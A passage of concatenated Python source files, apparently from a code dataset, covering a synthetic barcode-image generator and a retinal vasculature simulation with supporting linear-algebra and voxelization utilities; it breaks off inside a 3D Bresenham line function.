} |
#### File: jquenum/Barcodes-dataset-generator/generate_one_image.py
```python
import numpy as np
import cv2
import os
import random
import matplotlib.pyplot as plt
from tqdm import tqdm
from wordcloud import WordCloud
from random_words import RandomWords
from PIL import Image
import glob
# np.random.seed(42)
import pickle
clean_barcodes = []
for i in tqdm(range(36)):
with open("clean_barcodes_{}.pickle".format(i), 'rb') as f:
clean_barcodes += pickle.load(f)
def UpsamplingImage(img, up_sampling_factor = 2):
w = int(img.shape[1]*up_sampling_factor)
h = int(img.shape[0]*up_sampling_factor)
img_up = np.array(Image.fromarray(img).resize((w, h), resample=Image.BILINEAR))
return img_up
def show_images_overlayed_single (Im1, Im1_mask, title1=""):
a = 0.5 #transparency parameter
plt.figure(figsize=[10, 20])
plt.subplot(1, 2, 1)
plt.imshow(Im1, cmap="gray")
plt.subplot(1, 2, 2)
plt.imshow(Im1_mask, cmap="gray")
plt.figure(figsize=[10, 10])
plt.imshow(Im1, cmap="gray")
plt.imshow(Im1_mask, alpha=a)
def overlay(src, dest, upper_left):
x_start = upper_left[0]
x_end = upper_left[0] + src.shape[0]
y_start = upper_left[1]
y_end = upper_left[1] + src.shape[1]
dest[x_start:x_end, y_start:y_end] = src
return dest
def rotateImage(img, angle, borderValue=255):
(h, w) = img.shape
(cX, cY) = (w // 2, h // 2)
M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0)
cos = np.abs(M[0, 0])
sin = np.abs(M[0, 1])
nW = int((h * sin) + (w * cos))
nH = int((h * cos) + (w * sin))
M[0, 2] += (nW / 2) - cX
M[1, 2] += (nH / 2) - cY
return cv2.warpAffine(img, M, (nW, nH), borderMode=cv2.BORDER_CONSTANT,flags = cv2.INTER_AREA, borderValue=borderValue)
# warp img2 to img1 with homograph H
def warpTwoImages(img1, img2, H, borderValue=255):
h1,w1 = img1.shape[:2]
h2,w2 = img2.shape[:2]
pts1 = np.float32([[0,0],[0,h1],[w1,h1],[w1,0]]).reshape(-1,1,2)
pts2 = np.float32([[0,0],[0,h2],[w2,h2],[w2,0]]).reshape(-1,1,2)
pts2_ = cv2.perspectiveTransform(pts2, H)
pts = np.concatenate((pts1, pts2_), axis=0)
[xmin, ymin] = np.int32(pts.min(axis=0).ravel() - 0.5)
[xmax, ymax] = np.int32(pts.max(axis=0).ravel() + 0.5)
t = [-xmin,-ymin]
Ht = np.array([[1,0,t[0]],[0,1,t[1]],[0,0,1]]) # translate
result = cv2.warpPerspective(img2, Ht.dot(H), (xmax-xmin, ymax-ymin), borderMode=cv2.BORDER_CONSTANT, borderValue = borderValue)
result[t[1]:h1+t[1],t[0]:w1+t[0]] = img1
return result
def HomographyImage(img, x_bl, x_br, borderValue=255):
h, w = img.shape
pts_src = np.array([[0, 0], #top left
[0, w], #top right
[h, 0], #bottom left
[h, w]]) #bottom right
pts_dst = np.array([[0, 0], #top left
[0, w], #top right
[x_bl, 0], #bottom left
[x_br, w]]) #bottom right
H_mat, status = cv2.findHomography(pts_src, pts_dst)
out_hom_temp = cv2.warpPerspective(img, H_mat, (h,w), borderMode=cv2.BORDER_CONSTANT, borderValue = borderValue)
return warpTwoImages(out_hom_temp, img, H_mat, borderValue)
def ImEnlarger(im, Max_height, Max_width, borderValue=255):
#print(im.shape[0], im.shape[1])
row, col = im.shape
if row > Max_height or col > Max_width:
raise AttributeError("image is already larger than Max_size")
tpad_ = int(Max_height - row) // 2
bpad_ = int(Max_height - row) - tpad_
lpad_ = int(Max_width - col) // 2
rpad_ = int(Max_width - col) - lpad_
padded = cv2.copyMakeBorder(im, tpad_, bpad_, lpad_, rpad_, \
cv2.BORDER_CONSTANT, value=borderValue)
return padded
def DownsamplingImage(img, down_sampling_factor = 2):
w = int(img.shape[1]//down_sampling_factor)
h = int(img.shape[0]//down_sampling_factor)
img_down = np.array(Image.fromarray((img).astype(np.uint8)).resize((w, h), resample=Image.BILINEAR))
return img_down
def generateRandomWords(word_count = 120):
random_words = RandomWords().random_words(count=word_count)
for word in random_words[:word_count//3]:
word.capitalize()
for word in random_words[word_count//3:word_count//3*2]:
word.upper()
random_numbers = [str(num) for num in np.random.randint(1000, 10000000, size=word_count//3)]
words = ' '.join(random_words + random_numbers)
return words
"""
all_empty_images = []
print("loading empty images")
for im_name in tqdm(glob.glob("./empty_images/*.jpg")):
all_empty_images.append(cv2.imread(im_name))
def generate_random_background(background_shape):
rand_im = np.random.choice(all_empty_images)
h, w, c = rand_im.shape
max_h, max_w = h - background_shape[0], w - background_shape[1]
rand_h, rand_w = np.random.randint(0, max_h), np.random.randint(0, max_w)
return rand_im[rand_h:rand_h+background_shape[0], rand_w:rand_w+background_shape[1]]
"""
barcode_index = 0
def generate_one_training_image(num_barcodes = 5, barcode_border = 10, final_width = 2000, final_height = 2000, word_count = 120):
words = generateRandomWords(word_count=word_count)
image_width = final_width * 17 // 30
image_height = final_height * 17 // 30
image_size = min(image_width, image_height)
background = WordCloud(width=image_width, height=image_height, min_font_size=1, max_font_size=image_size*4//100,\
max_words=image_size//10, background_color="white", \
color_func=lambda *args, **kwargs: "black").generate(words).to_array()
background = cv2.cvtColor(background, cv2.COLOR_RGB2GRAY)
#background = WordCloud(width=image_width, height=image_height, min_font_size=1, max_font_size=image_size*4//100,\
# max_words=image_size//10, background_color=(1, 1, 1), \
# color_func=lambda *args, **kwargs: (0, 0, 0)).generate(words).to_array()
#im = generate_random_background((image_height, image_width))
#background = np.multiply(im, background)
mask_background_no_margin = np.zeros(background.shape)
all_single_barcode_masks = []
# paste barcodes on background
for i in range(num_barcodes):
global barcode_index
barcode = clean_barcodes[barcode_index % len(clean_barcodes)]
barcode_index += 1
barcode = barcode.astype(np.uint8)
barcode = UpsamplingImage(barcode, (final_width / 2000))
# barcode = cv2.cvtColor(barcode, cv2.COLOR_GRAY2RGB)
margined_barcode = cv2.copyMakeBorder(barcode, \
barcode_border, barcode_border, barcode_border, barcode_border,\
cv2.BORDER_CONSTANT, value=255)
# paste one barcode
paste_barcode_try = 0 # in case there is no possible no-overlap place
while (paste_barcode_try < 100):
x, y = np.random.randint(barcode_border, background.shape[1] - margined_barcode.shape[1]), np.random.randint(barcode_border, background.shape[0] - margined_barcode.shape[0])
upper_left = (y, x)
# check if target area contains any 255
if mask_background_no_margin[y-barcode_border:y+margined_barcode.shape[0],\
x-barcode_border:x+margined_barcode.shape[1]].max() > 0:
paste_barcode_try += 1
continue
background = overlay(margined_barcode, background, upper_left)
upper_left_no_margin = (upper_left[0] + barcode_border, upper_left[1] + barcode_border)
mask_background_no_margin = overlay(np.ones(barcode.shape) * 255, mask_background_no_margin, upper_left_no_margin)
single_barcode_mask = overlay(np.ones(barcode.shape) * 255, np.zeros(background.shape), upper_left_no_margin)
all_single_barcode_masks.append(single_barcode_mask)
break
# rotate and homography
rotation_angle = np.random.randint(0, 360)
homography_dst = (np.random.randint(background.shape[0], background.shape[0]*3//2), \
np.random.randint(background.shape[0], background.shape[0]*3//2))
background = rotateImage(HomographyImage(background, homography_dst[0], homography_dst[1]), rotation_angle)
mask_background_no_margin = rotateImage(HomographyImage(mask_background_no_margin, homography_dst[0],
homography_dst[1], borderValue=0),
rotation_angle, borderValue=0)
all_single_barcode_masks = [rotateImage(HomographyImage(single_barcode_mask, homography_dst[0],
homography_dst[1], borderValue=0),
rotation_angle, borderValue=0) for single_barcode_mask in all_single_barcode_masks]
# enlarge and generate dark border
border_color = np.random.randint(0, 200)
background = ImEnlarger(background, final_height, final_width, borderValue=border_color)
mask_background_no_margin = ImEnlarger(mask_background_no_margin, final_height, final_width, borderValue=0)
all_single_barcode_masks = [ImEnlarger(single_barcode_mask, final_height, final_width, borderValue=0) for single_barcode_mask in all_single_barcode_masks]
# darken
darkenFactor = np.clip(np.random.normal(0.9, 0.2), 0.5, 1.0)
background = darkenFactor*background.astype(np.float)
# find bounding boxes
all_bbx = []
for im in all_single_barcode_masks:
contours, _ = cv2.findContours(im.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
idx = 0
x,y,w,h = cv2.boundingRect(contours[0])
all_bbx.append([x,y,x+w,y+h])
return background, mask_background_no_margin, all_single_barcode_masks, all_bbx
``` |
{
"source": "jquetzalcoatl/SyntheticVasculature",
"score": 3
} |
#### File: jquetzalcoatl/SyntheticVasculature/DtN_tools.py
```python
import numpy as np
import matplotlib.pyplot as plt
def schur_comp(M,idx_set):
"""
computes the schur complement/the pieces of the schur complement for a matrix M
"""
comp_idx = [i for i in range(len(M)) if i not in idx_set]
A = M[np.ix_(idx_set,idx_set)]
B = M[np.ix_(idx_set,comp_idx)]
C = M[np.ix_(comp_idx,idx_set)]
D = M[np.ix_(comp_idx,comp_idx)]
return A - B @ np.linalg.inv(D) @ C, [A,B,C,D]
def steklov_spec(M,bdy_idx):
"""
computes the steklov spectrum corresponding to a Laplacian M and boundary nodes bdy_idx
"""
eigvals, eigvecs = np.linalg.eig(schur_comp(M,bdy_idx)[0])
eigval_sort = np.argsort(eigvals)
return eigvals[eigval_sort], eigvecs.T[eigval_sort]
def harmonic_extension(schur,u):
Hu = np.linalg.solve(schur[3],-schur[2]@u)
return Hu
```
#### File: SyntheticVasculature/OT_sims/laplacian_inverse.py
```python
import time
# Mathematical functions
import numpy as np
import scipy.sparse as scsp
import scipy.sparse.linalg as scspl
from numpy import linalg as lin
from math import *
def buildLaplacianMatrix(geomDic, eps):
"""Return a function which inverts the space-time Laplacian
Args:
geomDic: a dictionnary containing the relevant quantities concerning the space time domain
eps: a parameter to regularize the pb, we compute the inverse of [Laplacian + esp * Identity]
"""
# Unwrap what is needed in the dictionnary
nTime = geomDic["nTime"]
DeltaTime = geomDic["DeltaTime"]
nVertices = geomDic["nVertices"]
LaplacianDMatrix = geomDic["LaplacianDMatrix"]
areaVertices = geomDic["areaVertices"]
# Laplacian matrix in Time
# Usual 1D Laplace equation
LaplacianTimeMatrix = np.zeros((nTime + 1, nTime + 1))
# Fill the interior
for alpha in range(1, nTime):
LaplacianTimeMatrix[alpha, alpha] = -2.0
LaplacianTimeMatrix[alpha, alpha + 1] = 1.0
LaplacianTimeMatrix[alpha, alpha - 1] = 1.0
# Fill the upper left corner
LaplacianTimeMatrix[0, 1] = 1.0
LaplacianTimeMatrix[0, 0] = -1.0
# Fill the lower right corner
LaplacianTimeMatrix[-1, -2] = 1.0
LaplacianTimeMatrix[-1, -1] = -1.0
LaplacianTimeMatrix *= 1 / (DeltaTime ** 2)
# Array of 1/sqrt(2) except for the first and last coefficient
diagTimeMOH = 1 / sqrt(2) * np.ones(nTime + 1)
diagTimeMOH[0] = 1.0
diagTimeMOH[-1] = 1.0
# Same as the previous matrix, but vectorized in nVertices
diagTimeMOHVectorized = np.kron(diagTimeMOH, np.ones(nVertices)).reshape(
(nTime + 1, nVertices)
)
# Diagonalizing in Time and factorizing in D ----------------------------------------
startFact = time.time()
print("Factorizing the Laplace matrix...")
# Express the Laplacian in its new basis
LaplacianTimeMatrixModified = np.dot(
np.diag(diagTimeMOH), np.dot(LaplacianTimeMatrix, np.diag(diagTimeMOH))
)
# Compute the spectral decomposition of the Laplacian in Time
eigenValTime, eigenVectTime = np.linalg.eigh(LaplacianTimeMatrixModified)
# Prefactorizing the Laplace matrix
# For each eigenvalue lambda_i, listFactor[i] contains a method to
# solve (-lambda_i Id + Laplacian_D)x = b.
listFactor = []
for alpha in range(nTime + 1):
factor = scspl.factorized(
(
3. * LaplacianDMatrix
- eps * scsp.eye(nVertices)
+ eigenValTime[alpha] / 3. * scsp.diags([areaVertices], [0])
).tocsc()
)
listFactor.append(factor)
def LaplacianAuxInvert(input):
# Diagonalizing
input_diag = np.array(np.dot(eigenVectTime.transpose(), input))
# Solving for each line eigenvector
solution = np.zeros((nTime + 1, nVertices))
for alpha in range(nTime + 1):
solution[alpha, :] = listFactor[alpha](input_diag[alpha, :])
# Inverse diagonalization
output = np.array(np.dot(eigenVectTime, solution))
return output
def LaplacianInvert(input):
return np.multiply(
diagTimeMOHVectorized,
LaplacianAuxInvert(np.multiply(input, diagTimeMOHVectorized)),
)
endFact = time.time()
print(
"Factorizing the Laplace matrix: " + str(round(endFact - startFact, 2)) + "s."
)
return LaplacianInvert
```
#### File: SyntheticVasculature/simulations/auxin_model.py
```python
import numpy as np
g_fovea_pos = [0.0, 0.0, -1.0]
g_od_pos = [0.5, 0.0, -0.5*np.sqrt(3)]
def sphere_init_config(fovea_radius = 0.3,lens_depth = 0.3,num_pts = 100,inner_rad = 0.8,outer_rad = 1.2,prune_into_eye = True,bounding_box = None):
sample = []
while(len(sample) < num_pts):
pt = np.random.normal(size = 3)
pt /= np.linalg.norm(pt)
pt_rad = np.random.rand()*(outer_rad-inner_rad)+inner_rad
sample_pt = [pt,pt_rad]
if bounding_box is None:
if prune_into_eye:
if ((pt*pt_rad)[-1] <= 1-lens_depth) \
and (np.linalg.norm(pt*pt_rad - np.array(g_fovea_pos)) \
>= fovea_radius):
sample.append(sample_pt)
else:
if prune_into_eye:
if ((pt*pt_rad)[-1] <= 1-lens_depth) \
and (np.linalg.norm(pt*pt_rad - np.array(g_fovea_pos)) \
>= fovea_radius) and (isInBox(pt*pt_rad,bounding_box)):
sample.append(sample_pt)
return np.array(sample,dtype=object)
def geodesic_dist(p1,p2):
p1norm = np.linalg.norm(p1[0])
p2norm = np.linalg.norm(p2[0])
p1dotp2 = np.dot(p1[0],p2[0])
if np.abs(p1dotp2)>1.:
p1dotp2 = np.sign(p1dotp2)
return np.arccos(p1dotp2) + np.abs(p1[1] - p2[1])
def tangent_vector(p1,p2,normalized = True):
p1dotp2 = np.dot(p1[0],p2[0])
if np.abs(p1dotp2)>1.:
p1dotp2 = np.sign(p1dotp2)
p2bar = p2[0] - (p1dotp2)*np.array(p1[0])
p2bar /= np.linalg.norm(p2bar)
#print(p1dotp2)
if normalized:
return np.array([p2bar,(p2[1]-p1[1])/np.abs(p2[1]-p1[1])],dtype=object)
else:
return np.array([(np.arccos(p1dotp2))*p2bar, p2[1]-p1[1]],dtype=object)
def exp_map(pt, direction):
dirnorm = np.linalg.norm(direction[0])
#pt_dot_dir = np.dot(pt,dir)
#dir_bar = dir - pt_dot_dir*np.array(pt)
#dir_bar /= np.linalg.norm(dir_bar)
#theta_star = np.arccos(pt_dot_dir)
return np.array([np.cos(dirnorm)*np.array(pt[0]) + np.sin(dirnorm)*np.array(direction[0])/dirnorm,pt[1]+direction[1] ],dtype=object)
def isInInterval(pt, interval):
if (pt >= interval[0]) and (pt <= interval[1]):
return True
else:
return False
def isInBox(pt, bbox):
"""
pt should be of theform [x,y,z],
bbox should be [[xlow,xhigh],[ylow,yhigh],[zlow,zhigh]]
"""
if sum([isInInterval(pt[i],bbox[i]) for i in range(len(pt))]) == 3:
return True
else:
return False
def vascular_growth_sim(fovea_radius = 0.2,lens_depth = 0.5,max_iter = 1000,init_num_pts = 200,inner_rad = 0.7,outer_rad = 1.2,D_step = 0.9,death_dist = None,init_vasc = None,bounding_box=None):
"""
if init_vasc is None, then initialize pt_list and vascular structure
otherwise, init_vasc = (pt_list )
"""
if death_dist is None:
shell_vol = 4.*np.pi*0.5
approx_cover_rad = 0.1*np.sqrt((shell_vol/init_num_pts)*(3./4.)/np.pi)
death_dist = approx_cover_rad
#set up data structure
if init_vasc is None:
pt_list = [[g_od_pos, outer_rad]]
to_grow_indicator = np.array([1])
branches = [[0]]
branch_membership = [[0]]
else:
pt_list = list(init_vasc[0])
branches = init_vasc[1]
branch_membership = init_vasc[2]
#construct the indicator for whether a point is at the end of a branch
# by looping through branches
to_grow_indicator = np.zeros(len(pt_list))
for b in branches:
to_grow_indicator[b[-1]] = 1.
#sample auxin
sample_auxin = sphere_init_config(fovea_radius = fovea_radius,lens_depth = lens_depth,num_pts = init_num_pts,inner_rad = inner_rad,outer_rad = outer_rad,bounding_box = bounding_box)
init_sample = np.array(sample_auxin)
#print("sampled points are: \n");print(sample_auxin)
#set up auxin-vein node distance chart
auxin_vein_dists = [geodesic_dist(pt_list[0],s) for s in sample_auxin]
auxin_min_dists = [[0,d] for d in auxin_vein_dists ]
active_auxin = np.arange(len(init_sample))
#print("sampled point dists are: \n");print(auxin_vein_dists)
#print("sampled point dists are: \n");print(auxin_min_dists)
count = 0
#"while there are auxin nodes"
#while((count < max_iter) and (len(sample_auxin)>0)):
while((count < max_iter) and (len(active_auxin)>0)):
count += 1
#manually find the nearest neighbor
nns = [[] for pt in pt_list]
#print("getting nearest neighbors for {} auxin".format(len(sample_auxin)))
#for i in range(len(sample_auxin)):
for i in active_auxin:
#if i in list_deleted_red:
# continue
#match the nearest neighbor of an auxin node to the index of said auxin node
nns[int(auxin_min_dists[i][0])].append(i)
#
#now compute the step vectors
#print("the to grow indicators are {}".format(to_grow_indicator))
for i in range(len(pt_list))[::-1]:
#print("the nearest neighbors for {} are {}".format(i,nns[i]))
#print("pt {} s nearest neighbors are: {}".format(i,nns[i]))
if len(nns[i])>0:
#check if the given point is a head or not
#if not, generate a new branch
if to_grow_indicator[i] == 0:
branches.append([i])
branch_membership[i].append(len(branches)-1)
#compute the new step size
step_vec = sum([(1./len(nns[i]))*tangent_vector(pt_list[i],sample_auxin[k],normalized = False) for k in nns[i]])
vprime = exp_map(pt_list[i], [D_step*step_vec[0],D_step*step_vec[1]])
#check whether the proposed point is in the bounding box
#have a boolean defaulted to true, and then possibly turn to false otherwise
in_box_indicator = True
if bounding_box is not None:
if not isInBox(vprime[1]*vprime[0],bounding_box):
in_box_indicator = False
#if the new point is far enough away from the fovea:
if (np.linalg.norm(vprime[1]*vprime[0] - np.array(g_fovea_pos))\
> fovea_radius) and in_box_indicator:
#print("growing from {} to {}".format(pt_list[i],vprime))
#add the new point to the list of points
pt_list = np.vstack([pt_list,vprime])
#change the old grow indicator to 0
to_grow_indicator[i] = 0
#change the new grow indicator to 1
to_grow_indicator = np.append(to_grow_indicator,1)
#add branch information for this new branch
branch_membership.append([branch_membership[i][-1]])
branches[branch_membership[i][-1]].append(len(to_grow_indicator)-1)
#update distance array
#dists = np.array([geodesic_dist(vprime,s) for s in sample_auxin])
dists = np.array([geodesic_dist(vprime,sample_auxin[j]) for j in active_auxin])
#print("distances to auxin for vprime are: {}".format(dists))
#set up auxin-vein node distance chart
#auxin_vein_dists = np.vstack([auxin_vein_dists,dists])
#update min distances
#for j in range(len(sample_auxin))[::-1]:
temp_active_len = len(active_auxin)
for idx, j in enumerate(active_auxin):
if dists[idx] <= auxin_min_dists[j][1]:
#update the min distance array
#sample_auxin = np.delete(sample_auxin,j,0)
#print(f"idx: {idx}"); print(f"j: {j}")
#active_auxin = np.delete(active_auxin,temp_active_len-idx-1,0)
auxin_min_dists[j][1] = dists[idx]
auxin_min_dists[j][0] = len(to_grow_indicator)-1
#prune auxin nodes
#alternative: updated list_deleted_red
#for j in range(len(sample_auxin))[::-1]:
#for j in active_auxin[::-1]:
#first check whether or not the new point got close enough to an auxin node
#print(dists)
#if auxin_min_dists[j][1] < death_dist:
temp_active_len = len(active_auxin)
for j in np.arange(temp_active_len)[::-1]:
#first check whether or not the new point got close enough to an auxin node
if auxin_min_dists[active_auxin[j]][1] < death_dist:
#delete auxin
#sample_auxin = np.delete(sample_auxin,j,0)
#active_auxin = np.delete(active_auxin,j,0)
active_auxin = np.delete(active_auxin,j)
#auxin_vein_dists = np.delete(auxin_vein_dists,j,1)
#auxin_min_dists = np.delete(auxin_min_dists,j,0)
#print("to grow indicator is: \n"); print(to_grow_indicator)
#print("new point dists are: \n");print(auxin_vein_dists)
#print("new point dists are: \n");print(auxin_min_dists)
#while there are auxin nodes left or max_counts has been exceeded
#print(f"active_auxin: {len(active_auxin)}"); print(f"count: {count}")
return np.array(pt_list), branches, branch_membership, init_sample
def convert_from_product(pt_list):
new_pts = []
for pt in pt_list:
new_pts.append(pt[1]*np.array(pt[0]))
return np.array(new_pts)
def restrict_branches(pts,branches,branch_membership,max_height = -0.1):
pt_birth_times = np.zeros(len(pts))
pt_birth_times[0] = 1.
for br in branches:
for i in range(1,len(br)):
if pts[br[i]][-1] > max_height:
pt_birth_times[br[i]] = np.inf
else:
pt_birth_times[br[i]] = pt_birth_times[br[i-1]] + 1
#prune for points with birth times < infinity
new_branches = [[] for br in branches]
new_branch_membership = [[] for pt in pts]
for i in range(len(new_branches)):
for br_pt in branches[i]:
if pt_birth_times[br_pt] < np.inf:
new_branches[i].append(br_pt)
new_branch_membership[br_pt].append(i)
else:
break
return new_branches, new_branch_membership
#new_branches, new_branch_membership = restrict_branches(pts,pt_idx,branches,branch_membership)
def extract_graph(num_pts,branches):
#construct network
all_edges = []
for br in branches:
for i in range(len(br)-1):
all_edges.append((br[i],br[i+1]))
all_edges = list(set(all_edges))
A = np.zeros((num_pts,num_pts))
for e in all_edges:
A[e[0],e[1]] = 1
A[e[1],e[0]] = 1
#directed neighbors point from leafs to root
directed_neighbors = {i:[] for i in range(num_pts)}
for e in all_edges:
directed_neighbors[e[1]].append(e[0])
return np.array(all_edges), A,directed_neighbors
def get_vein_radii(directed_nbrs, A,init_radii = 0.05,branch_power = 3.):
num_pts = len(directed_nbrs)
vein_radii = np.zeros(num_pts)
#initialize leaves with init_radii
degrees = np.array([sum(r) for r in A])
vein_radii[degrees == 1] = init_radii
#make sure root does not have init_radii
vein_radii[0] = 0.
for i in range(num_pts)[::-1]:
for j in directed_nbrs[i]:
vein_radii[j] = (vein_radii[j]**branch_power + vein_radii[i]**branch_power)**(1./branch_power)
return vein_radii
def project_points(pts, A,projection_lim = 0.2):
projected_idx = np.arange(len(pts))[pts[:,2]<= projection_lim]
projected_pts = pts[projected_idx]
projected_A = A[np.ix_(projected_idx,projected_idx)]
projected_edges = []
for i in range(len(projected_A)-1):
for j in range(i+1, len(projected_A)):
if projected_A[i,j] >0:
projected_edges.append((i,j))
projected_edges = np.array(projected_edges)
return projected_pts, projected_edges,projected_idx
```
#### File: SyntheticVasculature/simulations/generate_retinas.py
```python
import argparse
import numpy as np
import os
import pandas as pd
import sys
import time
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import simulations.model_runner as MR
pe = os.path.exists
pj = os.path.join
HOME = os.path.expanduser("~")
def main(cfg):
output_dir = os.path.abspath( cfg["output_dir"] )
synet = MR.Vasculature("auxin", 500, output_dir+os.sep)
fovea_pos = [-0.5, 0.0, -0.5*np.sqrt(3)]
od_pos = [0.0, 0.5, -0.5*np.sqrt(3)]
synet.set_geometry(od=od_pos, fovea=fovea_pos)
time1 = time.time()
synet.run_simulation(step_size = 0.5, fovea_radius = 0.3)
time2 = time.time()
print("Simulation took {:.2f}s".format(time2-time1))
synet.generate_radii(0.1)
save_name = "sim_retina"
synet.generate_fundus_image(im_type="exact", save=True,
save_name=save_name)
synet.save_radii(save_name=save_name)
import pdb; pdb.set_trace()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output-dir", type=str,
default=pj(HOME, "Output/retina"))
cfg = vars( parser.parse_args() )
main(cfg)
```
#### File: SyntheticVasculature/simulations/model_runner.py
```python
import numpy as np
import os
import simulations.auxin_model as am
#import voxelizer as vx
import pyvista as pv
import scipy.spatial as spsp
from mayavi import mlab
import matplotlib.pyplot as plt
pe = os.path.exists
pj = os.path.join
HOME = os.path.expanduser("~")
class Vasculature:
model_type = None
init_num_pts = None
save_dir = None
voxel_size = 256
edges = None
d_nbrs = None
all_nbrs = None
coords = None
A = None
init_radii = 0.01
radii = None
edge_radii = None
SDF = None
voxels = None
fundus_image = None
def __init__(self,mt,inp,save_dir):
self.model_type = mt
self.init_num_pts = inp
self.save_dir = save_dir
return
def add_tumor(self):
#???
return
def set_geometry(self, od=None, fovea=None):
if od is not None:
am.g_od_pos = od
if fovea is not None:
am.g_fovea_pos = fovea
def run_simulation(self,step_size = 0.9,fovea_radius = 0.2,init_vasc = None,bounding_box=None):
if self.model_type == "auxin":
#run simulation
result = am.vascular_growth_sim(fovea_radius = fovea_radius, init_num_pts = self.init_num_pts,D_step = step_size,init_vasc = init_vasc,bounding_box=bounding_box)
#convert back to Euclidean coords
self.coords = am.convert_from_product(result[0])/1.2
init_sample = am.convert_from_product(result[-1])/1.2
branches = result[1]
branch_membership = result[2]
#extract
self.edges, self.A,self.d_nbrs = am.extract_graph(len(self.coords),branches)
all_nbrs = {i:[] for i in range(len(self.A))}
for e in self.edges:
all_nbrs[e[0]].append(e[1])
all_nbrs[e[1]].append(e[0])
self.all_nbrs = all_nbrs
self.edge_lookup = {tuple(np.sort(e)):i for i,e in enumerate(self.edges)}
self.radii = am.get_vein_radii(self.d_nbrs,self.A,init_radii = self.init_radii,branch_power = 3)
# import pdb; pdb.set_trace()
return
def generate_radii(self,init_r = 0.01):
self.init_radii = init_r
self.radii = am.get_vein_radii(self.d_nbrs,self.A,init_radii = init_r,branch_power = 3)
self.edge_radii = np.array([np.mean(self.radii[list(e)]) for e in self.edges])
return
def voxelize(self,fast_marching = True):
if self.edges is None:
self.run_simulation()
self.voxels = vx.generate_voxels(self.coords,self.voxel_size,self.edges,self.radii, fast_marching = fast_marching)
return
def generate_fundus_image(self,im_type="voxel",save = False,save_name = ""):
if im_type == "exact":
#set up circle mesh
thetas = 2.*np.pi*np.linspace(0,1,100)
xx = [1.1*np.cos(t) for t in thetas]
yy = [1.1*np.sin(t) for t in thetas]
xx.append(0); yy.append(0)
zz = [0. for i in xx]
tris = [[i,i+1,len(xx)-1] for i in range(len(xx)-2)]
tris.append([len(xx)-2,0,len(xx)-1])
tris = np.array(tris)
#draw mesh
mlab.figure(bgcolor=(0.,0.,0.), size=(1000,1000))
mlab.triangular_mesh(xx,yy,zz,tris,
opacity = 0.5,color = (0.95,0.7,0.1))
proj_pts, proj_e,proj_idx = am.project_points(self.coords, self.A)
src = mlab.plot3d(-proj_pts[:,0],proj_pts[:,1],[0. for p in proj_pts],0.01*self.radii[proj_idx],color=(1.,0.,0.))
src.parent.parent.filter.vary_radius = 'vary_radius_by_absolute_scalar'
src.mlab_source.dataset.lines = proj_e
lines = mlab.pipeline.stripper(src)
# import pdb; pdb.set_trace()
if save:
mlab.savefig(f"{self.save_dir}plots/{save_name}_exact-vein_radius-{self.init_radii:.3f}.png", size = (300,300))
mlab.close("all")
else:
mlab.show()
elif im_type == "voxel":
if self.voxels is None:
self.voxelize()
test_image = np.zeros((self.voxel_size+1,self.voxel_size+1))
for v in self.voxels:
if v[2] <= self.voxel_size/3.:
test_image[int(v[0]),int(v[1])] += 1
plt.imshow(test_image)
if save:
plt.savefig(f"{self.save_dir}plots/{save_name}_voxel-vein_radius-{self.init_radii:.3f}.png", size = (300,300))
plt.close("all")
else:
plt.show()
return
def generate_SDF(self):
if self.radii is None:
self.generate_radii()
inner_KDTREE = spsp.KDTree(self.coords)
def inner_SDF(pt):
nns = inner_KDTREE.query(pt,k=2)[1]
min_pair = None
min_dist = np.inf
for ii in nns:
for jj in self.all_nbrs[ii]:
proposed_dist = dist_to_line(pt,self.coords[ii],self.coords[jj])
if proposed_dist < min_dist:
min_pair = (ii,jj)
min_dist = proposed_dist
return min_dist - self.edge_radii[self.edge_lookup[tuple(np.sort([ii,jj]))]]
self.SDF = lambda x: inner_SDF(x)
return
def save_simulation(self,save_name = ""):
np.save( pj(self.save_dir, f"plots/{save_name}_edges") ,self.edges )
np.save( pj(self.save_dir, f"plots/{save_name}_coords") ,self.coords )
return
def load_simulation(self,save_name = "",model_type = "auxin"):
self.edges = np.load( pj(self.save_dir, f"plots/{save_name}_edges") )
self.coords = np.load( pj(self.save_dir, f"plots/{save_name}_coords") )
self.init_num_pts = len(self.coords)
self.model_type = model_type
return
def save_radii(self,save_name=""):
np.save(f"{self.save_dir}plots/{save_name}_radii-vein_radius-{self.init_radii:.3f}",self.radii)
return
def load_radii(self,init_radii,save_name=""):
self.radii = np.load(f"{self.save_dir}plots/{save_name}_radii-vein_radius-{init_radii:.3f}")
return
def save_voxels(self,save_name=""):
np.save(f"{self.save_dir}plots/{save_name}_voxel_centers-vein_radius-{self.init_radii:.3f}",self.voxels)
np.save(f"{self.save_dir}plots/{save_name}_voxel_fundus_image-vein_radius-{self.init_radii:.3f}",self.fundus_image)
return
def load_voxels(self,init_radii,save_name=""):
self.voxels = np.save(f"{self.save_dir}plots/{save_name}_voxel_centers-vein_radius-{init_radii:.3f}")
self.fundus_image = np.save(f"{self.save_dir}plots/{save_name}_voxel_fundus_image-vein_radius-{init_radii:.3f}")
return
def save_all_csv(self,save_name = ""):
#get and save coords
#get and save adj
#get and save adjD
#get and save leaves
return
def dist_to_line(pt, line_pt1, line_pt2):
"""
returns the distance of a point pt to the line spanned by line_pt1 and line_pt2
:param pt: np.array; the point in question
:param line_pt1: np.array; one endpoint of the line segment in question
:param line_pt2: np.array; another endpoint of the line segment in question
:return dist: the distance from the point to the line
"""
try:
#print(f"pt: {pt}, line_pt1: {line_pt1}, line_pt2: {line_pt2}")
s1 = line_pt2 - line_pt1
s1 /= np.linalg.norm(s1)
dist = np.linalg.norm((pt - s1) - np.dot(pt-s1,s1)*s1)
return dist
except:
return np.linalg.norm(pt - line_pt1)
```
#### File: SyntheticVasculature/simulations/voxelizer.py
```python
import numpy as np
def Bresenham3D(p1, p2):
#from https://www.geeksforgeeks.org/bresenhams-algorithm-for-3-d-line-drawing/
x1, y1, z1 = p1
x2, y2, z2 = p2
ListOfPoints = []
ListOfPoints.append((x1, y1, z1))
dx = abs(x2 - x1)
dy = abs(y2 - y1)
dz = abs(z2 - z1)
if (x2 > x1):
xs = 1
else:
xs = -1
if (y2 > y1):
ys = 1
else:
ys = -1
if (z2 > z1):
zs = 1
else:
zs = -1
# Driving axis is X-axis"
if (dx >= dy and dx >= dz):
p1 = 2 * dy - dx
p2 = 2 * dz - dx
while (x1 != x2):
